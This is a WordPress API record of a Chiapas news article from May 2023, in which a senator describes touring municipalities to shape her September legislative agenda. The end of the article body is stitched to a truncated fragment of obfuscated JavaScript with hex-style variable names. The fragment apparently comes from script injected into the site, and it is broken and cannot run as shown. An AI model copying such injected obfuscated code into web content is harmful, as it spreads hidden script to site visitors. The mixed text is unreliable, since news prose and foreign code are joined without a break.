{"id":10286,"date":"2023-05-31T04:46:03","date_gmt":"2023-05-31T04:46:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10286"},"modified":"2023-05-31T04:46:03","modified_gmt":"2023-05-31T04:46:03","slug":"preparan-en-el-senado-agenda-legislativa-para-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10286","title":{"rendered":"Preparan en el Senado Agenda Legislativa para Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-10287\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-30-at-4.34.51-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>30 de Mayo del 2023. San Crist\u00f3bal de Las Casas. &#8211; La Senadora chiapaneca, Sasil De Le\u00f3n Villard, coment\u00f3 en entrevista que durante este receso legislativo, se encuentra recorriendo los municipios de la entidad, con la finalidad de construir la agenda legislativa que se presentar\u00e1 en el mes de septiembre.<\/p>\n\n\n\n<p>\u201cEstamos en un largo receso, visitando los municipios de Chiapas, vamos a continuar por todos estos municipios, escuchando el sentir de los chiapanecos, para presentar una agenda legislativa en el mes de septiembre, si es que no hay un periodo extraordinario\u201d, dijo.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que en San Crist\u00f3bal se ha reunido con empresarios y hoteleros, con el objetivo de enriquecer su agenda legislativa, \u201cde escuchar de viva voz, el sentir de los chiapanecos, y los problemas que son diferentes en cada regi\u00f3n de nuestro estado\u201d.<\/p>\n\n\n\n<p>\u201cMe siento agradecida con el pueblo de Chiapas, que me han permitido servirles ya por casi 12 a\u00f1os, en espacios p\u00fablicos de elecci\u00f3n, fui diputada local, federal, ahora senadora, lo \u00fanico que tengo en Chiapas es agradecimiento profundo, lealtad, lo he demostrado con mi trabajo en el Senado, lo seguimos haciendo de manera responsable, en los tiempos electorales tendremos que estar trabajando\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 30 de Mayo del 2023. San Crist\u00f3bal de Las Casas. &#8211; La Senadora chiapaneca, Sasil De Le\u00f3n Villard, coment\u00f3 en entrevista que durante este receso legislativo, se encuentra recorriendo los municipios de la entidad, con la finalidad de construir la agenda legislativa que se presentar\u00e1 en el mes de septiembre. \u201cEstamos en un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10287,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10286","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10286"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10286\/revisions"}],"predecessor-version":[{"id":10288,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10286\/revisions\/10288"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10287"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}